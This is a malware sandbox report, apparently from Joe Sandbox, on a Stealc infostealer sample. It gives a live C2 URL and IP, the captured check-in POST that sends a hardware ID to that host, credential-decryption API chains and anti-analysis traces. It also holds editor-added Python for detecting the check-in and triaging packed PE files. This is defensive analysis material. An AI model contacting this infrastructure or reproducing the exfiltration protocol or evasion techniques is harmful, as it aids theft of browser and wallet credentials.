Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532981
MD5: 9fa6a87d6ac6c29173f38b8de4ea7272
SHA1: c333a6778cc153fdbbadccc1cda4f575103c818c
SHA256: 56b3a862526d4a5ae4311c3b742a7a42cd6206939944458e3566694b1cddf0ba
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5588 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9FA6A87D6AC6C29173F38B8DE4EA7272)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
YARA matches (Source / Rule / Description / Author):
Source: dump.pcap  Rule: JoeSecurity_Stealc_1  Yara detected Stealc  Joe Security
Source: 00000000.00000002.2170845587.00000000013CE000.00000004.00000020.00020000.00000000.sdmp  Rule: JoeSecurity_Stealc  Yara detected Stealc  Joe Security
Source: 00000000.00000003.2036482176.00000000050F0000.00000004.00001000.00020000.00000000.sdmp  Rule: JoeSecurity_Stealc  Yara detected Stealc  Joe Security
Source: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp  Rule: JoeSecurity_Stealc  Yara detected Stealc  Joe Security
Source: Process Memory Space: file.exe PID: 5588  Rule: JoeSecurity_PowershellDownloadAndExecute  Yara detected Powershell download and execute  Joe Security
Source: Process Memory Space: file.exe PID: 5588  Rule: JoeSecurity_Stealc  Yara detected Stealc  Joe Security
Source: 0.2.file.exe.730000.0.unpack  Rule: JoeSecurity_Stealc  Yara detected Stealc  Joe Security

No Sigma rule has matched

Suricata alert: Timestamp 2024-10-14T08:58:08.073470+0200, SID 2044243, Severity 1, Classtype "Malware Command and Control Activity Detected", 192.168.2.5:49704 -> 185.215.113.37:80, TCP

AV Detection

Source: file.exe  Avira: detected
Source: http://185.215.113.37/  URL Reputation: Label: malware
Source: http://185.215.113.37  URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php  URL Reputation: Label: malware
Source: http://185.215.113.37/ws  URL Reputation: Label: malware
Source: 0.2.file.exe.730000.0.unpack  Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample  Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe  Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0073C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00737240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00739AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00739B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00748EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe  Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_007438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00744910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0073DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0073E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00744570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0073ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0073BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0073DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_007316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0073F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00743EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0073F68A FindFirstFileA

Networking

Source: Network traffic  Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor  URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic  HTTP traffic detected: GET / HTTP/1.1  Host: 185.215.113.37  Connection: Keep-Alive  Cache-Control: no-cache
Source: global traffic  HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1  Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFI  Host: 185.215.113.37  Content-Length: 211  Connection: Keep-Alive  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 33 44 46 45 45 30 31 45 34 46 34 30 33 33 30 36 30 30 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a
  Data Ascii (CRLF line breaks restored from the raw bytes):
    ------JKKFIIEBKEGIEBFIJKFI
    Content-Disposition: form-data; name="hwid"

    2C3DFEE01E4F4033060071
    ------JKKFIIEBKEGIEBFIJKFI
    Content-Disposition: form-data; name="build"

    doma
    ------JKKFIIEBKEGIEBFIJKFI--
Source: Joe Sandbox View  IP Address: 185.215.113.37
Source: Joe Sandbox View  ASN Name: WHOLESALECONNECTIONSNL
Source: unknown  TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times; the C2 is contacted by IP address, so no DNS lookup precedes the connections)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00736280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown  HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 (the same request and body as listed above; note that no User-Agent header is sent)
Source: file.exe, 00000000.00000002.2170845587.00000000013CE000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2170845587.0000000001426000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2170845587.0000000001426000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2170845587.0000000001440000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phphS)
Source: file.exe, 00000000.00000002.2170845587.0000000001426000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpi
Source: file.exe, 00000000.00000002.2170845587.0000000001426000.00000004.00000020.00020000.00000000.sdmp  String found in binary or memory: http://185.215.113.37/ws
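The POST above is the check-in the Suricata rule fired on: a multipart/form-data body carrying the victim's hwid and the build name ("doma", the same value the configuration extractor reports as Botnet), sent without a User-Agent header. The following Python is an added example (the editor's code, not part of the Joe Sandbox report or of the Stealc sample): it parses that exact body and applies a heuristic match for the check-in shape. The request headers and body are rebuilt from the report's Data Raw dump (identical bytes, 211 as in Content-Length); the classification rule and its field checks are the editor's own and are not the ET/SEKOIA signature the report references.

```python
"""Parse and classify the Stealc check-in POST captured in this report.

Added example (editor's code, not Joe Sandbox or Stealc code). The headers and
body below are reconstructed from the report's "Data Raw" dump; the heuristic
in looks_like_stealc_checkin() is the editor's, not a vendor signature.
"""
import re
from typing import Dict

# Request headers as captured in the report; there is no User-Agent header.
SAMPLE_HEADERS: Dict[str, str] = {
    "Content-Type": "multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFI",
    "Host": "185.215.113.37",
    "Content-Length": "211",
    "Connection": "Keep-Alive",
    "Cache-Control": "no-cache",
}

# Body bytes rebuilt from the report's hex dump (211 bytes, matching Content-Length).
SAMPLE_BODY: bytes = (
    b"------JKKFIIEBKEGIEBFIJKFI\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"2C3DFEE01E4F4033060071\r\n"
    b"------JKKFIIEBKEGIEBFIJKFI\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"doma\r\n"
    b"------JKKFIIEBKEGIEBFIJKFI--\r\n"
)


def boundary_from_content_type(content_type: str) -> str:
    """Extract the boundary parameter of a multipart/form-data Content-Type."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("not a multipart request: %r" % content_type)
    return m.group(2)


def parse_multipart(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Split a multipart/form-data body into {field name: raw value}.

    Deliberately minimal: the check-in carries only simple form fields, so file
    parts, nested multiparts and Content-Transfer-Encoding are not handled.
    """
    delimiter = b"--" + boundary.encode("ascii")
    fields: Dict[str, bytes] = {}
    # split() yields the preamble, one chunk per part, and the closing "--" tail.
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter reached
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        headers, _, value = chunk.partition(b"\r\n\r\n")
        if value.endswith(b"\r\n"):
            value = value[:-2]  # the CRLF that precedes the next delimiter
        name = re.search(rb'name="([^"]*)"', headers)
        if name:
            fields[name.group(1).decode("ascii", "replace")] = value
    return fields


def looks_like_stealc_checkin(headers: Dict[str, str], fields: Dict[str, bytes]) -> bool:
    """Editor's heuristic for the check-in shape seen in this report: a multipart
    POST whose only fields are an upper-case-hex "hwid" and a "build", sent without
    a User-Agent header. Tune before production use; other tooling may post
    similarly named fields."""
    if "user-agent" in {k.lower() for k in headers}:
        return False
    if set(fields) != {"hwid", "build"}:
        return False
    return re.fullmatch(rb"[0-9A-F]+", fields["hwid"]) is not None


if __name__ == "__main__":
    boundary = boundary_from_content_type(SAMPLE_HEADERS["Content-Type"])
    parsed = parse_multipart(SAMPLE_BODY, boundary)
    print({k: v.decode() for k, v in parsed.items()})
    print("stealc-like check-in:", looks_like_stealc_checkin(SAMPLE_HEADERS, parsed))
```

Run against a PCAP by feeding each HTTP POST's headers and body to the two functions; the build value is what ties a capture back to the extracted configuration, and the hwid is what the operator panel keys victims on, so both belong in an incident record.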

System Summary

Source: file.exe  Static PE information: section name: (blank)
Source: file.exe  Static PE information: section name: .rsrc
Source: file.exe  Static PE information: section name: .idata
Source: file.exe  Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AD780C
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00BC1043
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00B939C6
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_009AE977
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AF8AFE
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00A25A5C
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_009A2CFA
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AF0400
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFDC4D
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00B05525
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00B07E9C
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFA6DB
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AC8606
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFF7B7
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AF6FE0
Source: C:\Users\user\Desktop\file.exe  Code function: String function: 007345C0 appears 316 times
Source: file.exe  Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe  Static PE information: Section: lyglkzel ZLIB complexity 0.9946942065135542
Source: file.exe, 00000000.00000003.2036482176.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp  Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine  Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00749600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00743720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe  File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\48Y782M4.htm
Source: C:\Users\user\Desktop\file.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe  String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe  Sections loaded: apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\file.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe  Static file information: File size 1856512 > 1048576
Source: file.exe  Static PE information: Raw size of lyglkzel is bigger than: 0x100000 < 0x19f000
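The static findings above (a section named lyglkzel larger than 1 MiB with ZLIB complexity close to 1.0, section names that are blank or random) and the ones under Data Obfuscation further down (entry point in .taggant, stored checksum 0x1ccae4 against a computed 0x1d13a0, writable and executable sections) are the usual footprint of a packed executable. The following Python is an added example by the editor, not Joe Sandbox code: it re-derives those indicators from any PE file, parsing only the headers it needs. The list of standard section names, the 7.0-bit entropy threshold and the built-in minimal sample PE are the editor's constructions, not values taken from the report.

```python
"""Static PE triage for the packer indicators this report lists for file.exe.
Added example (editor's code, not Joe Sandbox output). STANDARD_SECTIONS,
HIGH_ENTROPY and build_sample_pe() are the editor's own choices/constructions."""
import math
import struct
from collections import namedtuple
from typing import Dict, List

STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata", ".pdata", ".tls", ".bss"}
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000
HIGH_ENTROPY = 7.0  # editor's threshold; the report scores lyglkzel at 7.95 bits/byte

Section = namedtuple("Section", "name virtual_address virtual_size raw_data characteristics")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts if c)


def pe_checksum(image: bytes, checksum_offset: int) -> int:
    """PE CheckSum as CheckSumMappedFile computes it: fold every 16-bit word except
    the CheckSum field itself into 16 bits, then add the file size."""
    total = 0
    for off in range(0, len(image) - 1, 2):
        if checksum_offset <= off < checksum_offset + 4:
            continue
        total += struct.unpack_from("<H", image, off)[0]
        total = (total & 0xFFFF) + (total >> 16)
    if len(image) % 2:
        total += image[-1]
    total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total & 0xFFFF) + len(image)


def parse_pe(image: bytes):
    """Return (entry_point_rva, stored_checksum, checksum_offset, sections)."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", image, 0x3C)[0]
    if image[pe:pe + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    num_sections, opt_size = struct.unpack_from("<H12xH", image, pe + 6)
    opt = pe + 24
    entry_rva = struct.unpack_from("<I", image, opt + 16)[0]
    checksum_offset = opt + 64  # same offset in PE32 and PE32+
    stored = struct.unpack_from("<I", image, checksum_offset)[0]
    sections: List[Section] = []
    for i in range(num_sections):
        hdr = opt + opt_size + 40 * i
        name, vsize, vaddr, rsize, rptr = struct.unpack_from("<8sIIII", image, hdr)
        chars = struct.unpack_from("<I", image, hdr + 36)[0]
        sections.append(Section(name.rstrip(b"\0").decode("latin-1"), vaddr, vsize, image[rptr:rptr + rsize], chars))
    return entry_rva, stored, checksum_offset, sections


def triage(image: bytes) -> Dict[str, object]:
    """Each key mirrors one of the report's static signatures. A stored CheckSum of 0
    means 'not set' (common for unsigned builds), not a forged value like 0x1ccae4."""
    entry_rva, stored, cs_off, sections = parse_pe(image)
    computed = pe_checksum(image, cs_off)
    entry_section = next((s.name for s in sections if s.virtual_address <= entry_rva
                          < s.virtual_address + max(s.virtual_size, len(s.raw_data))), None)
    entropy = {s.name: round(shannon_entropy(s.raw_data), 3) for s in sections}
    return {
        "checksum_stored": stored,
        "checksum_computed": computed,
        "checksum_valid": stored == computed,
        "entry_section": entry_section,
        "entry_outside_standard": entry_section not in STANDARD_SECTIONS,
        "nonstandard_names": [s.name for s in sections if s.name not in STANDARD_SECTIONS],
        "unprintable_names": [s.name for s in sections if not s.name.strip() or not s.name.isprintable()],
        "high_entropy": {n: e for n, e in entropy.items() if e >= HIGH_ENTROPY},
        "writable_executable": [s.name for s in sections if s.characteristics & IMAGE_SCN_MEM_EXECUTE
                                and s.characteristics & IMAGE_SCN_MEM_WRITE],
    }


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 (editor's sample, not file.exe): a zero-filled .text and an
    RWX .taggant that holds the entry point and all 256 byte values (entropy 8.0)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic; CheckSum (offset 64) left at 0
    struct.pack_into("<I", opt, 16, 0x2000)  # AddressOfEntryPoint
    headers_len = 64 + 4 + 20 + 224 + 2 * 40
    text = struct.pack("<8sIIIIIIHHI", b".text", 64, 0x1000, 64, headers_len, 0, 0, 0, 0, 0x60000020)
    tag = struct.pack("<8sIIIIIIHHI", b".taggant", 256, 0x2000, 256, headers_len + 64, 0, 0, 0, 0, 0xE0000020)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text + tag + bytes(64) + bytes(range(256))


if __name__ == "__main__":
    import sys
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for key, value in triage(image).items():
        print(f"{key}: {value}")
```

`python triage.py file.exe` prints the same kind of findings the report lists; with no argument it runs on the constructed sample. None of these indicators is proof of malice on its own (installers and protected commercial software trip the entropy and checksum checks too), which is why the report combines them with behavioural and YARA evidence.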

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe  Unpacked PE file: 0.2.file.exe.730000.0.unpack  :EW;.rsrc :W;.idata :W; :EW;lyglkzel:EW;njsekajy:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;lyglkzel:EW;njsekajy:EW;.taggant:EW; (section rights of the unpacked image versus the original file: the first, unnamed section is E+R on disk but E+W once unpacked, which is what the "changes PE section rights" signature refers to)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00749860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample  Static PE information: section where entry point is pointing to: .taggant
Source: file.exe  Static PE information: real checksum: 0x1ccae4 should be: 0x1d13a0
Source: file.exe  Static PE information: section name: (blank)
Source: file.exe  Static PE information: section name: .rsrc
Source: file.exe  Static PE information: section name: .idata
Source: file.exe  Static PE information: section name: (blank)
Source: file.exe  Static PE information: section name: lyglkzel
Source: file.exe  Static PE information: section name: njsekajy
Source: file.exe  Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00DCA0EF  push edx; mov dword ptr [esp], 3EAFA226h  (at 0_2_00DCA10A)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00DCA0EF  push 64CE05C3h; mov dword ptr [esp], ebp  (at 0_2_00DCA15D)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00B7C88C  push ecx; mov dword ptr [esp], ebx  (at 0_2_00B7C8C5)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00BD8082  push eax; mov dword ptr [esp], 3FFB79F5h  (at 0_2_00BD83B1)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0074B035  push ecx; ret  (at 0_2_0074B048)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00B258E0  push eax; mov dword ptr [esp], edi  (at 0_2_00B25921)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push 39FB0514h; mov dword ptr [esp], ebp  (at 0_2_00AFC0EC)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push edx; mov dword ptr [esp], esp  (at 0_2_00AFC118)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push 0FF68C04h; mov dword ptr [esp], ebx  (at 0_2_00AFC12C)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push edx; mov dword ptr [esp], esi  (at 0_2_00AFC194)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push 22340554h; mov dword ptr [esp], ebx  (at 0_2_00AFC1FA)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push ecx; mov dword ptr [esp], edx  (at 0_2_00AFC242)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push 01A284E3h; mov dword ptr [esp], edi  (at 0_2_00AFC26C)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push ebp; mov dword ptr [esp], ebx  (at 0_2_00AFC314)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push 13613DFEh; mov dword ptr [esp], ebx  (at 0_2_00AFC379)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push 1817E9D8h; mov dword ptr [esp], edi  (at 0_2_00AFC44D)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push 03177B71h; mov dword ptr [esp], esi  (at 0_2_00AFC4C4)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push edi; mov dword ptr [esp], ebx  (at 0_2_00AFC55E)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push ebx; mov dword ptr [esp], 55FC2DDFh  (at 0_2_00AFC5A9)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push ecx; mov dword ptr [esp], edx  (at 0_2_00AFC623)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push 15731E63h; mov dword ptr [esp], eax  (at 0_2_00AFC670)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push edx; mov dword ptr [esp], ebx  (at 0_2_00AFC67F)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push edx; mov dword ptr [esp], eax  (at 0_2_00AFC692)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push ebp; mov dword ptr [esp], edi  (at 0_2_00AFC6FB)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push ecx; mov dword ptr [esp], edx  (at 0_2_00AFC717)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push ecx; mov dword ptr [esp], ebp  (at 0_2_00AFC77C)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push ebx; mov dword ptr [esp], ecx  (at 0_2_00AFC796)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push 546EBD69h; mov dword ptr [esp], ebp  (at 0_2_00AFC7C8)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push edx; mov dword ptr [esp], ebx  (at 0_2_00AFC7F5)
Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00AFC0DB  push 025FD4A7h; mov dword ptr [esp], ecx  (at 0_2_00AFC91C)
